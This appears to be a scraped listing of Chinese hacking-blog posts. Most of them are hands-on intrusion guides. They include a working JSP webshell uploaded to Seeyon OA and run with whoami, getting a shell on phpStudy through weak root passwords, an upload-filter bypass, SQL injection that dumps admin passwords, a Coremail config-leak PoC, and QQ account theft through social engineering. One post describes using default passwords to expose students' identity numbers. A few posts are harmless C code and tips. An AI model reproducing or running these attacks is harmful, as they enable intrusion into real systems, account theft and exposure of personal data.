-
互联网上的信息泄漏
声明:文章只做技术交流,请勿用于非法用途 github 上的配置信息泄漏 GitHub是一个面向开源及私有软件项目的托管平台,因为只支持git 作为唯一的版本库格式进行托管,故名GitHub。 打开github官网。搜索字符串jdbc:mysql。 选择: code 和 Recently indexed。 这样就查询出含 jdbc:mysql的最新更新的代码。图中可以看到,已经查到了腾讯云数据库连接地址和账号密码。 尝试使用 navicat 连接后,成功连接。 无论密码和用户名多复杂,一旦泄漏,也就没用了 当然,由于GitHub本身的搜索算法的原因,结果可能和我们想的不一样。但是手动查找后,还是能找到一些成果的。 *国内的码云也可以用类似的方法去搜索,不过效果不如GitHub。 日志文件泄漏 网络空间资产检索系统(FOFA)是世界上数据覆盖最完整的IT设备搜索引擎,拥有全球联网IT设备最全DNA信息。探索全球互联网的资产信息,进行资产及漏洞影响范围分析、应用分布统计、应用流行度态势感知等。 打开FOFA搜索引擎,输入:body="log.txt" && country=CN。便可以查找到有关log.txt的IP。 点开一个可以看到: 当然,这个里面没有什么敏感的信息。细心去找的话,还是能找到不少的。 除了搜索日志,也可以搜索sql文件、后台路径等等。 除此之外,大家熟知的可能还有 google搜索、钟馗之眼等等,都可以用来搜索具有某种特征的IP,合理利用就可以查询到大量信息。所以,在日常工作生活中,需要多多注意一些敏感信息的使用,做好个人信息、公司信息的保护。 ...
-
基于 UDP /ARP发现内网存活主机
UDP简介: UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报文发送之后,是无法得知其是否安全完整到达的。 UDP显著特性: 1.UDP 缺乏可靠性。UDP 本身不提供确认,超时重传等机制。UDP 数据报可能在网络中被复制,被重新排序,也不保证每个数据报只到达一次。 2.UDP 数据报是有长度的。每个 UDP 数据报都有长度,如果一个数据报正确地到达目的地,那么该数据报的长度将随数据一起传递给接收方。而 TCP 是一个字节流协议,没有任何(协议上的)记录边界。 3.UDP 是无连接的。UDP 客户和服务器之前不必存在长期的关系。大多数的UDP实现中都选择忽略源站抑制差错,在网络拥塞时,目的端无法接收到大量的UDP数据报 4.UDP 支持多播和广播 利用nmap扫描 nmap -sU -T5 -sV --max-retries 1 192.168.0.1/24 -p 500 Shell 复制 或者 nmap -sU -T4 -sV 192.168.0.1/24 Shell 复制 msf扫描 msf5 > use auxiliary/scanner/discovery/udp_probe msf5 auxiliary(scanner/discovery/udp_probe) > show options Module options (auxiliary/scanner/discovery/udp_probe): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads msf5 auxiliary(scanner/discovery/udp_probe) > set RHOSTS 192.168.0.1/24 RHOSTS => 192.168.0.1/24 msf5 auxiliary(scanner/discovery/udp_probe) > set THREADS 10 THREADS => 10 msf5 auxiliary(scanner/discovery/udp_probe) > run Shell 复制 或者执行 use auxiliary/scanner/discovery/udp_sweep Shell 复制 ARP简介: ARP,通过解析网路层地址来找寻数据链路层地址的一个在网络协议包中极其重要的网络传输协议。根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址 nmap扫描 nmap -sn -PR 192.168.0.1/24 Shell 复制 普及 osi七层模型图解 ...
-
外面接单的QQ永久方法稳
722解封永久冻结QQ漏洞教程 条件: 1.微信绑定了冻结的QQ号 2.微信钱包已经实名认证 3.微信不能停封 教程: 教程:拨打电话95017,按提示按9,然后输入被冻结的QQ,按#号。 然后输入微信的实名认证的身份证,按#号。输入微信支付密码,按#号。 然后输入目前拨打电话的手机号,按#号。然后回收到短信,无需理会, 按电话语音提示是否冻结微信号,按#号,然后提示是否冻结微信绑定的QQ号,按#号。 然后会收到三条短信,接着挂断电话,去:aq.qq.com/007即可修改QQ密码。 然后去:https://url.cn/5LNndkJ解封微信帐号,即可 ...
-
利用社会工程学申诉盗号技术
社会工程学 很多朋友,不懂这个社会工程学,是啥意思》》》》 社工(社会工程学)简称,一种人为心理学的攻击手段,大概主旨含义你可以理解成所有的防火墙或者权限,再安全也只是相对的,因为操作他的是人,所以只要对人身进行了渗透攻击,那所有的信息会被你暴露无遗。 还可以理解为,通过心里学的手段骗取人的信任,并且最终获得他的个人资料或者是他身处的其他信息。 很多朋友经常问我你是怎么盗取别人账号的,,,现实生活中也有一上来就问: “嘿,毒蜂你是怎么盗号的,能不能教教我???!!” 今天毒蜂就给大家讲解一下,以前毒蜂还是六年级小学生的时候是如何社工我同学QQ号的emm 首先为了锻炼技术and好奇网上一堆社会工程学说的是不是真的,所以我假装不认识他。但是我手里有我班同学的身份证号(这个关于怎么社工身份证网上有很多教程,但是我觉得都不怎么样!不知道大牛有没有什么好滴办法)其他的我都百度+社工库! 其次想要一个等级比较高的QQ账号,因为这样看起来比较装X和靓丽, 幸幸苦苦社工别人账号,只为了你们能叫我一声“靓仔”,结果他们却把账号申诉回去,还叫了我“屌毛”{可以忽略这段,主要为了缓解气氛} ok开始 1.在社工库查到他2个曾用密码和去谷歌搜索引擎搜索他的各种账号(很有可能搜索到你想要的信息) 2.然后百度查他微博,查看资料知道名字、住址(尽量收集对我们盗号有利的信息) 3.然后去他空间,翻他的说说跟留言板,开小号加了他经常联系的几个朋友(赞他说说,给他留言的人) 4.用小号跟加那几个好友说:我号被盗!帮忙申诉!对方回复OK!就ok了(友情提示:一定要找3个或3个以上好友 否则几率会变小!我前两次就是因为好友少所以失败!!!!!) OK!!一切准备就绪! 5.进入QQ安全中心 申诉!填写姓名 、身份证号 然后下一步,就是曾用密码(社工库查到的),注册地常登陆地(微博有资料),看Q龄知道他的注册年份!然后填写好友QQ、手机号(用小号直接问!) 然后申诉 成功改密码密保! 6.打电话催办申诉,直接给客服提供你所收集到的信息 关于那个社工身份证号,我有一点想法,首先就是了解其喜好或者是最近在干什么,比方说!我看见他说说上学了!那么我就可以查出他的学校,然后伪装成学校招生办!要求提供身份证!当然这只是一个思路!!希望老鸟能提供更好的方法!!! 此教学仅作为学习参考,请勿用于违法犯罪用途 ...
-
用C语言画出一个“爱心”,撩妹技能杠杠的
用C语言画出一个“爱心”,撩妹技能杠杠的 编程之美 源于发现 用C语言,编写自己人生的源代码!!! 学习C语言虽然乏味,枯燥。但是我们可以在玩中学,可以自己输出一些字符画,来放松心情。 爱心字符画代码如下; #include <stdio.h> int main() { for (float y = 1.5f; y > -1.5f; y -= 0.1f) { for (float x = -1.5f; x < 1.5f; x += 0.05f) { float a = x * x + y * y - 1; putchar(a * a * a - x * x * y * y * y <= 0.0f ? '*' : ' '); } putchar('\n'); } } 输入图: 程序运行效果图: 在学习中,寻找灵感,不断TOP C语言编程的种种局限和不可能!!! 只有想不到,没有做不到!!! ...
-
360浏览器 – dll劫漏洞
0x00:前言 记录下学习的浏览器漏洞方法。 这个漏洞很简单,很多浏览器里面都有。 0x01:原理 浏览器启动时,会自动加载当前目录下载dll模块,在加载系统dll,若发现存在dll模块存在时,浏览器就会调用该dll模块执行。如果加载中未发现 dll,攻击者可以构造一个恶意dll。 0x02:360浏览器dll window.location.href='https://api.3v1.cc/violation/?word= window.location.href='https://api.3v1.cc/violation/?word= window.location.href='https://api.3v1.cc/violation/?word=劫持'; '; '; 使用到的工具: Procmon汉化版 v3.20.0.0 dll模块(可自己编写32位,兼容性。) DllHijackAuditor (自动化工具效果不是太好) procexp 360最新版本的...
-
树洞外链xss+越权漏洞
0x00:xss漏洞 上传一张图片,在创建文件名添加xss,公开是分享文件广场。 ><svg/onload=alert(6)> 0x01:越权 (需要条件,可以爆破。32位随机字符) 需要key值。 c74bffaa1cd2a4eda30bd72fe5453bb0 0x02:结束语 爬了一下在用树洞外链的网站,一共有211个网站。...
-
windows安装中国蚁剑
中国蚁剑 antSword-github antSword-百度网盘 安装步骤 等初始化完成后,然后如图再打开一次AntSword.ext就ok了...
-
利用PHPstudy探针弱口令漏洞批量拿shell
关键字:phpStudy 探针 2014 搜到后随便找一个站 然后打开是这种的 弱口令:root 成功,如下图 然后进入phpmyadmin 后台账号是root密码也是root 接下来就是怎么拿shell了 探针上面有个绝对路径和探针路径,我们这里需要的是绝对路径。如图 进入后台我们需要打开变量 然后在变量里面找到general log 和 general log file 你可以用 CTRL+F 需要把general log 改成ON 把 general log file修改成绝对路径的地址。C:/phpStudy/WWW/.xxx.php >>>这个xxx.php是你一句话的地址 如图。 修改好后。我们需要把这个命令插入到我们指定的php文件里 如图。 ...
-
关于coremail的0day附带poc
import requests,sys def mailsmsPoC(url): url = url + “/mailsms/s?func=ADMIN:appState&dumpConfig=/” r = requests.get(url) if (r.status_code != ‘404’) and (“/home/coremail” in r.text): print “mailsms is vulnerable: {0}”.format(url) else: print “mailsms is safe!” if __name__ == ‘__main__’: try: mailsmsPoC(sys.argv[1]) except: print “usage: python poc.py http://hi-ourlife.com/” 修改url即可用 ...
-
Python爬虫之-爬取妹子图片
#coding=utf-8 import requests from bs4 import BeautifulSoup import os all_url = ‘http://www.mzitu.com’ #http请求头 Hostreferer = { ‘User-Agent’:’Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)’, ‘Referer’:’http://www.mzitu.com’ } Picreferer = { ‘User-Agent’:’Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)’, ‘Referer’:’http://i.meizitu.net’ } #此请求头破解盗链 start_html = requests.get(all_url,headers = Hostreferer) #保存地址 path = ‘G:\python\妹子\liang’ #找寻最大页数 soup = BeautifulSoup(start_html.text,”html.parser”) page = soup.find_all(‘a’,class_=’page-numbers’) max_page = page[-2].text same_url = ‘http://www.mzitu.com/page/’ for n in range(1,int(max_page)+1): ul = same_url+str(n) start_html = requests.get(ul, headers = Hostreferer) soup = BeautifulSoup(start_html.text,”html.parser”) all_a = soup.find(‘div’,class_=’postlist’).find_all(‘a’,target=’_blank’) for a in all_a: title = a.get_text() #提取文本 if(title != ”): print(“准备扒取:”+title) #win不能创建带?的目录 if(os.path.exists(path+title.strip().replace(‘?’,”))): #print(‘目录已存在’) flag=1 else: os.makedirs(path+title.strip().replace(‘?’,”)) flag=0 os.chdir(path + title.strip().replace(‘?’,”)) href = a[‘href’] html = requests.get(href,headers = Hostreferer) mess = BeautifulSoup(html.text,”html.parser”) pic_max = mess.find_all(‘span’) pic_max = pic_max[10].text #最大页数 if(flag == 1 and len(os.listdir(path+title.strip().replace(‘?’,”))) >= int(pic_max)): print(‘已经保存完毕,跳过’) continue for num in range(1,int(pic_max)+1): pic = href+’/’+str(num) html = requests.get(pic,headers = Hostreferer) mess = BeautifulSoup(html.text,”html.parser”) pic_url = mess.find(‘img’,alt = title) print(pic_url[‘src’]) #exit(0) html = requests.get(pic_url[‘src’],headers = Picreferer) file_name = pic_url[‘src’].split(r’/’)[-1] f = open(file_name,’wb’) f.write(html.content) f.close() print(‘完成’) print(‘第’,n,’页完成’) ...
-
武汉某大学-学生信息泄露
也是无聊的时候无意间逛见的,进入主题。 看到可能会想怎么进去,我就去百度搜了一下教务管理系统用户名和密码是多少 百度告诉我的答案普遍是账号是学号密码也是学号或者密码是123456, 接下来知道了那么我们该怎么去获取学号呢。 1.百度武汉xxxx职业技术学院学号 如图 接下来去试试此学号有无有用。 上面百度收集到的信息说是密码可能是学号也可能是123456 或者是别的试一试吧 运气不错进来了。那么就看看有没有别的信息了 我在学籍卡片处看到往下滑的时候看到了身份证号!!! 这已经涉及到信息泄露了。 接下来,我们在试试别的学号看能否进。 以此学号 推断一下 学号:1113033 7位数 试试1113034 能否进去 依旧可以用进 推断密码默认学号。学号是用递进的方式形成的, 我们看到了图上所示 院系:智能制造工程系 专业:包装技术与设计 学制:3.0 班级:11级包装技术与设计1班 我们看到了这些 再看学号(学号是1113034) 注意到什么没 11级 一班正好对应学号前面的111 那么把111修改成 1513001试试看呢。 成功 密码依旧是学号,那么就可以以此类推,但是我在这次进15级的这个学生我发现了,地址也有了, 就到这了吧。 此学校泄露信息。有姓名,身份证,地址。证件照。 ...
-
SWAPIDC答题答案
注意答案排序可能不一样 第一题 第二题 第三题 第四题 ...
-
致远OA系统远程命令代码执行漏洞
1.致远OA A8无需认证代码执行漏洞 网站地址:http://127.0.0.1:8088/seeyon/index.jsp 因为不方便透露漏洞网址,就用127.0.0.1代替。网站页面如下↓↓↓ 2. 接下来用:/seeyon/htmlofficeservlet 来访问。http://127.0.0.1:8088/seeyon/htmlofficeservlet 如果出现了 DBSTEP V3.0 0 21 0 htmoffice operate err 哪就证明可能漏洞是存在的 3. 然后我们打开burp,需要POST一个shell上去.如何抓包就不说了。 然后点Go 4. 然后复制下面的jsp木马到POST包里面如图 DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV OPTION=S3WYOSWLBSGr currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66 CREATEDATE=wUghPB3szB3Xwg66 RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6 originalFileId=wV66 originalCreateDate=wUghPB3szB3Xwg66 FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6 needReadFile=yRWZdAS6 originalCreateDate=wLSGP4oEzLKAz4=iz=66 <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println(" “+excuteCmd(request.getParameter(“cmd”)) + “ “);}else{out.println(“:-)”);}%>6e4f045d4b8506bf492ada7e3390d7ce 5. 上面成功插入了jsp一句话木马接下来如下。 默认文件名是:test123456 然后访问网站 http://127.0.0.1:8088/seeyon/test.jsp 6. 然后运行以下代码 /seeyon/test.jsp?pwd=asasd3344&cmd=whoami 完整如这>>> http://127.0.0.1:8088/seeyon/test.jsp?pwd=asasd3344&cmd=whoami 运行成功 administrator权限能干什么就不用多说了吧 请勿进行违法操作 ...
-
一次实战拿shell上传绕过
一、物理路径 在url后面随便输入个字符,得到网站物理路径 二、whois信息 没有查到其他whois信息 三、Whatweb 四、端口 21端口是文件传输协议,如果被非正常手段登录,将会面临服务器/空间文件泄露问题 3306端口是mysql数据库的默认端口,如果被非正常手段登录,将会面临数据库泄露问题 445是曾经暴出”永恒之蓝”病毒的端口 五、后台 后台系统及型号 六、编辑器 抓包获取编辑器地址,并且发现是dede下的编辑器,估计模板也是dede二次加工的了。 七、拿shell(仅列举一种方法-上传绕过) 直接上传一句话木马(php后缀),提示文件类型不正确 将一句话木马后缀修改为jpg格式,继续上传 。 上传成功。打开burpsuite,重新上传jpg后缀的一句话木马 。 将yjh.jpg修改为yjh.php[空格]。一定要在修改完的php后缀后面加上一个空格。如下图 然后点击action里面的send to repeater 。 打开repeater下的Hex,查找到yjh.php文件,修改对应行Hex值,由20改为00 。 即可发现原来的空格已经没有了 。 然后点击Go,放包。 链接访问成功,然后拿出中国菜刀,连接shell。 ...
-
C语言-扬帆起航
用C语言在控制台输出 一些字符图案!!! 编译器:VS2019版本 代码如下 #include<stdio.h> #include<windows.h> int color(int c) { SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), c); //更改文字颜色 return 0; } int main() { color(13); printf(" \n"); printf(" | | | \n"); printf(" )_) )_) )_) \n"); printf(" )___))___))___)╲_ \n"); printf(" )____)____)_____)╲╲_ \n"); printf(" H ____E___|__L__|__L__|__O__╲╲╲__________ \n"); printf(" ---------╲_____偏锋表哥_____扬帆起航_____________╱--------- \n"); printf(" ^^^^^ ^^^^^ ^^^^ ^^^^^^^ ^^^^^ ^^^ \n"); printf(" \n"); return 0; } 效果图 ...
-
SQL注入语法
1.判断有无注入点: http://127.0.0.1/index.asp?id=1 and 1=1 http://127.0.0.1/index.asp?id=1 and 1=2 http://127.0.0.1/index.asp?id=1′ 2.猜字段数: http://127.0.0.1/index.asp?id=1 order by 字段数 例如: http://127.0.0.1/?id=index.asp? order by 11 http://127.0.0.1/?id=index.asp? order by 12 order by 11页面显示正常 order by 12 页面报错所以字段为11 3.暴露管理员用户、密码: http://127.0.0.1/index.asp?id=1 union select 1,2,3,4,5,6,7,8,9,10,11 from admin 1、在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字为2和3 2、在链接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】即可暴露管理员用户名和密码 http://127.0.0.1/index.asp?id=1 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin 3、到此,即可知道管理员用户名:admin和密码:123456 >>>比较老的一种sql注入.大佬勿喷...
-
简单一招查出有没有人在你电脑里面“偷”资料
简单一招查出有没有人在你电脑里面“偷”资料 1.左下角 找到“运行” 2. 在运行里面输入 regedit 3.然后按下面的目录 依次打开 HKEY_LOCAL_MACHINE/SYSTEM/CurrentContorSet/Enum/USBSTOR/ Disk&Ven_SanDisk&Prod_Ultra_USB_3.0&Rev_1.00 这个就是使用过的U盘目录 我的电脑是这个 4.我电脑上用过的U盘太多 我就随便选择一个 右边这里就是 使用过的痕迹 5. 这里 右键点击权限 6.打开后 就是这个界面 然后我们把 拒绝下面的选项 全部 √ 上 这样就可以 禁止 这个U 盘 在我们的电脑上“读写”了 (每个U盘的ID都是唯一的) ...
-
解决Win7系统开机显示one or more table pointers are invalid
WIN7电脑系统 一开机就显示:fatal error: one or more table pointers are invalid modification could be unsafe 按回车可进入系统 (这种情况很多时候是发生在装有固态硬盘的电脑上) 解决方法 先进入系统 点击左下角开始 开始 --运行-- cmd (以管理员身份运行) 输入slmgr -upk (卸载秘钥) 回车 稍等一会 就会出现卸载成功的界面 然后重启一遍 再用别的激活工具激活一下系统 再重启 ,就不会显示one or more table pointers are invalid。 ...
-
CVE-2019-0708漏洞检测工具
CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。 有大佬在GitHub上公布CVE-2019-0708的检测工具,并提交了MSF的auxiliary模块。因此,使用MSF即可对目标计算机进行漏洞检测。 GitHub项目:https://github.com/zerosum0x0/CVE-2019-0708 MSF模块:https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb 演示环境:Kali、Windows Server 2008 R2 64位。 Windows服务器需要开启远程桌面服务。 使用方法: 第1步:下载auxiliary模块 从GitHub下载cve_2019_0708_bluekeep.rb文件,把该文件放到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下。 第2步:启动MSF 第3步:使用cve_2019_0708_bluekeep检测模块 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep 第4步:设置目标计算机IP set RHOSTS 192.168.56.133 第5步:开始检测 exploit 如下图红框显示,目标计算机存在CVE-2019-0708漏洞。 ...